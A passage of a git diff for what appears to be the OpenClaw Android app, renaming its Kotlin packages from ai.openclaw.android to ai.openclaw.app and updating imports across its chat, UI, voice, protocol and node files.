ai.openclaw.android.PermissionRequester +import ai.openclaw.app.PermissionRequester /** * Sends SMS messages via the Android SMS API. diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/SystemHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/SystemHandler.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/SystemHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/SystemHandler.kt index ee794f7ac4e..2ec6ed56ad7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/SystemHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/SystemHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.app.NotificationChannel @@ -9,7 +9,7 @@ import android.os.Build import androidx.core.app.NotificationCompat import androidx.core.app.NotificationManagerCompat import androidx.core.content.ContextCompat -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonObject import kotlinx.serialization.json.JsonPrimitive diff --git a/apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIAction.kt b/apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIAction.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIAction.kt rename to apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIAction.kt index 7e1a5bf127e..acbb3bf5cbd 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawCanvasA2UIAction.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawCanvasA2UIAction.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.protocol +package ai.openclaw.app.protocol import kotlinx.serialization.json.JsonObject import kotlinx.serialization.json.JsonPrimitive diff --git a/apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawProtocolConstants.kt b/apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawProtocolConstants.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawProtocolConstants.kt rename to apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawProtocolConstants.kt index a2816e257fa..ef4c2d95c96 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/protocol/OpenClawProtocolConstants.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/protocol/OpenClawProtocolConstants.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.protocol +package ai.openclaw.app.protocol enum class OpenClawCapability(val rawValue: String) { Canvas("canvas"), diff --git a/apps/android/app/src/main/java/ai/openclaw/android/tools/ToolDisplay.kt b/apps/android/app/src/main/java/ai/openclaw/app/tools/ToolDisplay.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/tools/ToolDisplay.kt rename to apps/android/app/src/main/java/ai/openclaw/app/tools/ToolDisplay.kt index 1c5561767e6..77844187e8a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/tools/ToolDisplay.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/tools/ToolDisplay.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.tools +package ai.openclaw.app.tools import android.content.Context import kotlinx.serialization.Serializable diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/CameraHudOverlay.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/CameraHudOverlay.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/CameraHudOverlay.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/CameraHudOverlay.kt index 21043d739b0..658c4d38cc3 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/CameraHudOverlay.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/CameraHudOverlay.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.foundation.background import androidx.compose.foundation.layout.Box diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/CanvasScreen.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/CanvasScreen.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt index f733d154ed9..5bf3a60ec01 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/CanvasScreen.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import android.annotation.SuppressLint import android.util.Log @@ -21,7 +21,7 @@ import androidx.compose.ui.platform.LocalContext import androidx.compose.ui.viewinterop.AndroidView import androidx.webkit.WebSettingsCompat import androidx.webkit.WebViewFeature -import ai.openclaw.android.MainViewModel +import ai.openclaw.app.MainViewModel @SuppressLint("SetJavaScriptEnabled") @Composable diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/ChatSheet.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/ChatSheet.kt similarity index 53% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/ChatSheet.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/ChatSheet.kt index 85f20364c61..1abc76e7859 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/ChatSheet.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/ChatSheet.kt @@ -1,8 +1,8 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.runtime.Composable -import ai.openclaw.android.MainViewModel -import ai.openclaw.android.ui.chat.ChatSheetContent +import ai.openclaw.app.MainViewModel +import ai.openclaw.app.ui.chat.ChatSheetContent @Composable fun ChatSheet(viewModel: MainViewModel) { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/ConnectTabScreen.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/ConnectTabScreen.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/ConnectTabScreen.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/ConnectTabScreen.kt index 875b82796d3..4b8ac2c8e5d 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/ConnectTabScreen.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/ConnectTabScreen.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.animation.AnimatedVisibility import androidx.compose.foundation.BorderStroke @@ -46,7 +46,7 @@ import androidx.compose.ui.text.font.FontFamily import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.text.input.KeyboardType import androidx.compose.ui.unit.dp -import ai.openclaw.android.MainViewModel +import ai.openclaw.app.MainViewModel private enum class ConnectInputMode { SetupCode, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/GatewayConfigResolver.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/GatewayConfigResolver.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/GatewayConfigResolver.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/GatewayConfigResolver.kt index 4421a82be4b..93b4fc1bb60 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/GatewayConfigResolver.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/GatewayConfigResolver.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.core.net.toUri import java.util.Base64 diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/MobileUiTokens.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/MobileUiTokens.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/MobileUiTokens.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/MobileUiTokens.kt index eb4f95775e7..5f93ed04cfa 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/MobileUiTokens.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/MobileUiTokens.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.ui.graphics.Brush import androidx.compose.ui.graphics.Color @@ -7,7 +7,7 @@ import androidx.compose.ui.text.font.Font import androidx.compose.ui.text.font.FontFamily import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.unit.sp -import ai.openclaw.android.R +import ai.openclaw.app.R internal val mobileBackgroundGradient = Brush.verticalGradient( diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/OnboardingFlow.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/OnboardingFlow.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/OnboardingFlow.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/OnboardingFlow.kt index cc596706ec0..417abd34e52 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/OnboardingFlow.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/OnboardingFlow.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import android.Manifest import android.content.Context @@ -84,10 +84,10 @@ import androidx.core.net.toUri import androidx.lifecycle.Lifecycle import androidx.lifecycle.LifecycleEventObserver import androidx.lifecycle.compose.LocalLifecycleOwner -import ai.openclaw.android.LocationMode -import ai.openclaw.android.MainViewModel -import ai.openclaw.android.R -import ai.openclaw.android.node.DeviceNotificationListenerService +import ai.openclaw.app.LocationMode +import ai.openclaw.app.MainViewModel +import ai.openclaw.app.R +import ai.openclaw.app.node.DeviceNotificationListenerService import com.journeyapps.barcodescanner.ScanContract import com.journeyapps.barcodescanner.ScanOptions diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/OpenClawTheme.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/OpenClawTheme.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/OpenClawTheme.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/OpenClawTheme.kt index aad743a6d7d..e3f0cfaac9c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/OpenClawTheme.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/OpenClawTheme.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.foundation.isSystemInDarkTheme import androidx.compose.material3.MaterialTheme diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/PostOnboardingTabs.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/PostOnboardingTabs.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/PostOnboardingTabs.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/PostOnboardingTabs.kt index e7adf00b18f..0642f9b3a7e 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/PostOnboardingTabs.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/PostOnboardingTabs.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.foundation.background import androidx.compose.foundation.BorderStroke @@ -44,7 +44,7 @@ import androidx.compose.ui.graphics.vector.ImageVector import androidx.compose.ui.platform.LocalDensity import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.unit.dp -import ai.openclaw.android.MainViewModel +import ai.openclaw.app.MainViewModel private enum class HomeTab( val label: String, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/RootScreen.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/RootScreen.kt similarity index 88% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/RootScreen.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/RootScreen.kt index e50a03cc5bf..03764b11a22 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/RootScreen.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/RootScreen.kt @@ -1,11 +1,11 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.foundation.layout.fillMaxSize import androidx.compose.runtime.Composable import androidx.compose.runtime.collectAsState import androidx.compose.runtime.getValue import androidx.compose.ui.Modifier -import ai.openclaw.android.MainViewModel +import ai.openclaw.app.MainViewModel @Composable fun RootScreen(viewModel: MainViewModel) { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/SettingsSheet.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/SettingsSheet.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/SettingsSheet.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/SettingsSheet.kt index cd1368db1b4..1be0e23b63f 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/SettingsSheet.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/SettingsSheet.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import android.Manifest import android.content.Context @@ -66,10 +66,10 @@ import androidx.core.net.toUri import androidx.lifecycle.Lifecycle import androidx.lifecycle.LifecycleEventObserver import androidx.lifecycle.compose.LocalLifecycleOwner -import ai.openclaw.android.BuildConfig -import ai.openclaw.android.LocationMode -import ai.openclaw.android.MainViewModel -import ai.openclaw.android.node.DeviceNotificationListenerService +import ai.openclaw.app.BuildConfig +import ai.openclaw.app.LocationMode +import ai.openclaw.app.MainViewModel +import ai.openclaw.app.node.DeviceNotificationListenerService @Composable fun SettingsSheet(viewModel: MainViewModel) { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/TalkOrbOverlay.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/TalkOrbOverlay.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/TalkOrbOverlay.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/TalkOrbOverlay.kt index f89b298d1f7..0aba5e91078 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/TalkOrbOverlay.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/TalkOrbOverlay.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import androidx.compose.animation.core.LinearEasing import androidx.compose.animation.core.RepeatMode diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/VoiceTabScreen.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/VoiceTabScreen.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/VoiceTabScreen.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/VoiceTabScreen.kt index 921f5ed016e..be66f42bef3 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/VoiceTabScreen.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/VoiceTabScreen.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui +package ai.openclaw.app.ui import android.Manifest import android.app.Activity @@ -66,9 +66,9 @@ import androidx.core.content.ContextCompat import androidx.lifecycle.Lifecycle import androidx.lifecycle.LifecycleEventObserver import androidx.lifecycle.compose.LocalLifecycleOwner -import ai.openclaw.android.MainViewModel -import ai.openclaw.android.voice.VoiceConversationEntry -import ai.openclaw.android.voice.VoiceConversationRole +import ai.openclaw.app.MainViewModel +import ai.openclaw.app.voice.VoiceConversationEntry +import ai.openclaw.app.voice.VoiceConversationRole import kotlin.math.max @Composable diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/Base64ImageState.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/Base64ImageState.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/Base64ImageState.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/Base64ImageState.kt index c54b80b6e84..b2b540bdb7a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/Base64ImageState.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/Base64ImageState.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import android.graphics.BitmapFactory import android.util.Base64 diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatComposer.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatComposer.kt similarity index 94% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatComposer.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatComposer.kt index 22099500ebf..9601febfa31 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatComposer.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatComposer.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import androidx.compose.foundation.BorderStroke import androidx.compose.foundation.horizontalScroll @@ -46,17 +46,17 @@ import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.text.style.TextOverflow import androidx.compose.ui.unit.dp import androidx.compose.ui.unit.sp -import ai.openclaw.android.ui.mobileAccent -import ai.openclaw.android.ui.mobileAccentSoft -import ai.openclaw.android.ui.mobileBorder -import ai.openclaw.android.ui.mobileBorderStrong -import ai.openclaw.android.ui.mobileCallout -import ai.openclaw.android.ui.mobileCaption1 -import ai.openclaw.android.ui.mobileHeadline -import ai.openclaw.android.ui.mobileSurface -import ai.openclaw.android.ui.mobileText -import ai.openclaw.android.ui.mobileTextSecondary -import ai.openclaw.android.ui.mobileTextTertiary +import ai.openclaw.app.ui.mobileAccent +import ai.openclaw.app.ui.mobileAccentSoft +import ai.openclaw.app.ui.mobileBorder +import ai.openclaw.app.ui.mobileBorderStrong +import ai.openclaw.app.ui.mobileCallout +import ai.openclaw.app.ui.mobileCaption1 +import ai.openclaw.app.ui.mobileHeadline +import ai.openclaw.app.ui.mobileSurface +import ai.openclaw.app.ui.mobileText +import ai.openclaw.app.ui.mobileTextSecondary +import ai.openclaw.app.ui.mobileTextTertiary @Composable fun ChatComposer( @@ -148,7 +148,7 @@ fun ChatComposer( Text( text = "Gateway is offline. Connect first in the Connect tab.", style = mobileCallout, - color = ai.openclaw.android.ui.mobileWarning, + color = ai.openclaw.app.ui.mobileWarning, ) } @@ -346,7 +346,7 @@ private fun chatTextFieldColors() = @Composable private fun mobileBodyStyle() = MaterialTheme.typography.bodyMedium.copy( - fontFamily = ai.openclaw.android.ui.mobileFontFamily, + fontFamily = ai.openclaw.app.ui.mobileFontFamily, fontWeight = FontWeight.Medium, fontSize = 15.sp, lineHeight = 22.sp, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMarkdown.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMarkdown.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMarkdown.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMarkdown.kt index 6b5fd6d8dbd..a8f932d8607 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMarkdown.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMarkdown.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import androidx.compose.foundation.Image import androidx.compose.foundation.background @@ -34,12 +34,12 @@ import androidx.compose.ui.text.style.TextDecoration import androidx.compose.ui.text.withStyle import androidx.compose.ui.unit.dp import androidx.compose.ui.unit.sp -import ai.openclaw.android.ui.mobileAccent -import ai.openclaw.android.ui.mobileCallout -import ai.openclaw.android.ui.mobileCaption1 -import ai.openclaw.android.ui.mobileCodeBg -import ai.openclaw.android.ui.mobileCodeText -import ai.openclaw.android.ui.mobileTextSecondary +import ai.openclaw.app.ui.mobileAccent +import ai.openclaw.app.ui.mobileCallout +import ai.openclaw.app.ui.mobileCaption1 +import ai.openclaw.app.ui.mobileCodeBg +import ai.openclaw.app.ui.mobileCodeText +import ai.openclaw.app.ui.mobileTextSecondary import org.commonmark.Extension import org.commonmark.ext.autolink.AutolinkExtension import org.commonmark.ext.gfm.strikethrough.Strikethrough diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageListCard.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageListCard.kt similarity index 90% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageListCard.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageListCard.kt index 889de006cb4..0c34ff0d763 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageListCard.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageListCard.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import androidx.compose.foundation.layout.Arrangement import androidx.compose.foundation.layout.Box @@ -15,13 +15,13 @@ import androidx.compose.runtime.LaunchedEffect import androidx.compose.ui.Alignment import androidx.compose.ui.Modifier import androidx.compose.ui.unit.dp -import ai.openclaw.android.chat.ChatMessage -import ai.openclaw.android.chat.ChatPendingToolCall -import ai.openclaw.android.ui.mobileBorder -import ai.openclaw.android.ui.mobileCallout -import ai.openclaw.android.ui.mobileHeadline -import ai.openclaw.android.ui.mobileText -import ai.openclaw.android.ui.mobileTextSecondary +import ai.openclaw.app.chat.ChatMessage +import ai.openclaw.app.chat.ChatPendingToolCall +import ai.openclaw.app.ui.mobileBorder +import ai.openclaw.app.ui.mobileCallout +import ai.openclaw.app.ui.mobileHeadline +import ai.openclaw.app.ui.mobileText +import ai.openclaw.app.ui.mobileTextSecondary @Composable fun ChatMessageListCard( diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageViews.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageViews.kt similarity index 90% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageViews.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageViews.kt index 9ba5540f2d9..9d08352a3f0 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatMessageViews.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatMessageViews.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import androidx.compose.foundation.BorderStroke import androidx.compose.foundation.Image @@ -25,24 +25,24 @@ import androidx.compose.ui.text.font.FontFamily import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.unit.dp import androidx.compose.ui.unit.sp -import ai.openclaw.android.chat.ChatMessage -import ai.openclaw.android.chat.ChatMessageContent -import ai.openclaw.android.chat.ChatPendingToolCall -import ai.openclaw.android.tools.ToolDisplayRegistry -import ai.openclaw.android.ui.mobileAccent -import ai.openclaw.android.ui.mobileAccentSoft -import ai.openclaw.android.ui.mobileBorder -import ai.openclaw.android.ui.mobileBorderStrong -import ai.openclaw.android.ui.mobileCallout -import ai.openclaw.android.ui.mobileCaption1 -import ai.openclaw.android.ui.mobileCaption2 -import ai.openclaw.android.ui.mobileCodeBg -import ai.openclaw.android.ui.mobileCodeText -import ai.openclaw.android.ui.mobileHeadline -import ai.openclaw.android.ui.mobileText -import ai.openclaw.android.ui.mobileTextSecondary -import ai.openclaw.android.ui.mobileWarning -import ai.openclaw.android.ui.mobileWarningSoft +import ai.openclaw.app.chat.ChatMessage +import ai.openclaw.app.chat.ChatMessageContent +import ai.openclaw.app.chat.ChatPendingToolCall +import ai.openclaw.app.tools.ToolDisplayRegistry +import ai.openclaw.app.ui.mobileAccent +import ai.openclaw.app.ui.mobileAccentSoft +import ai.openclaw.app.ui.mobileBorder +import ai.openclaw.app.ui.mobileBorderStrong +import ai.openclaw.app.ui.mobileCallout +import ai.openclaw.app.ui.mobileCaption1 +import ai.openclaw.app.ui.mobileCaption2 +import ai.openclaw.app.ui.mobileCodeBg +import ai.openclaw.app.ui.mobileCodeText +import ai.openclaw.app.ui.mobileHeadline +import ai.openclaw.app.ui.mobileText +import ai.openclaw.app.ui.mobileTextSecondary +import ai.openclaw.app.ui.mobileWarning +import ai.openclaw.app.ui.mobileWarningSoft import java.util.Locale private data class ChatBubbleStyle( diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatSheetContent.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatSheetContent.kt similarity index 92% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatSheetContent.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatSheetContent.kt index 12e13ab365a..2c09f4488b0 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/ChatSheetContent.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/ChatSheetContent.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat import android.content.ContentResolver import android.net.Uri @@ -32,22 +32,22 @@ import androidx.compose.ui.text.font.FontWeight import androidx.compose.ui.text.style.TextOverflow import androidx.compose.ui.unit.dp import androidx.compose.ui.unit.sp -import ai.openclaw.android.MainViewModel -import ai.openclaw.android.chat.ChatSessionEntry -import ai.openclaw.android.chat.OutgoingAttachment -import ai.openclaw.android.ui.mobileAccent -import ai.openclaw.android.ui.mobileBorder -import ai.openclaw.android.ui.mobileBorderStrong -import ai.openclaw.android.ui.mobileCallout -import ai.openclaw.android.ui.mobileCaption1 -import ai.openclaw.android.ui.mobileCaption2 -import ai.openclaw.android.ui.mobileDanger -import ai.openclaw.android.ui.mobileSuccess -import ai.openclaw.android.ui.mobileSuccessSoft -import ai.openclaw.android.ui.mobileText -import ai.openclaw.android.ui.mobileTextSecondary -import ai.openclaw.android.ui.mobileWarning -import ai.openclaw.android.ui.mobileWarningSoft +import ai.openclaw.app.MainViewModel +import ai.openclaw.app.chat.ChatSessionEntry +import ai.openclaw.app.chat.OutgoingAttachment +import ai.openclaw.app.ui.mobileAccent +import ai.openclaw.app.ui.mobileBorder +import ai.openclaw.app.ui.mobileBorderStrong +import ai.openclaw.app.ui.mobileCallout +import ai.openclaw.app.ui.mobileCaption1 +import ai.openclaw.app.ui.mobileCaption2 +import ai.openclaw.app.ui.mobileDanger +import ai.openclaw.app.ui.mobileSuccess +import ai.openclaw.app.ui.mobileSuccessSoft +import ai.openclaw.app.ui.mobileText +import ai.openclaw.app.ui.mobileTextSecondary +import ai.openclaw.app.ui.mobileWarning +import ai.openclaw.app.ui.mobileWarningSoft import java.io.ByteArrayOutputStream import kotlinx.coroutines.Dispatchers import kotlinx.coroutines.launch diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/SessionFilters.kt b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/SessionFilters.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/ui/chat/SessionFilters.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ui/chat/SessionFilters.kt index 68f3f409960..2f496bcb6cd 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ui/chat/SessionFilters.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ui/chat/SessionFilters.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.ui.chat +package ai.openclaw.app.ui.chat -import ai.openclaw.android.chat.ChatSessionEntry +import ai.openclaw.app.chat.ChatSessionEntry private const val RECENT_WINDOW_MS = 24 * 60 * 60 * 1000L diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/ElevenLabsStreamingTts.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/ElevenLabsStreamingTts.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/ElevenLabsStreamingTts.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/ElevenLabsStreamingTts.kt index 0cbe669409b..ff13cf73911 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/ElevenLabsStreamingTts.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/ElevenLabsStreamingTts.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import android.media.AudioAttributes import android.media.AudioFormat diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/MicCaptureManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/MicCaptureManager.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/MicCaptureManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/MicCaptureManager.kt index 099c7c1cd1e..39bacbeca5b 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/MicCaptureManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/MicCaptureManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import android.Manifest import android.content.Context diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/StreamingMediaDataSource.kt b/apps/android/app/src/main/java/ai/openclaw/app/voice/StreamingMediaDataSource.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/voice/StreamingMediaDataSource.kt rename to apps/android/app/src/main/java/ai/openclaw/app/voice/StreamingMediaDataSource.kt index 329707ad56a..90bbd81b8bd 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/voice/StreamingMediaDataSource.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/voice/StreamingMediaDataSource.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.voice +package ai.openclaw.app.voice import android.media.MediaDataSource import kotlin.math.min diff --git a/apps/android/app/src/main/java/ai/openclaw/android/voice/TalkDirectiveParser.kt 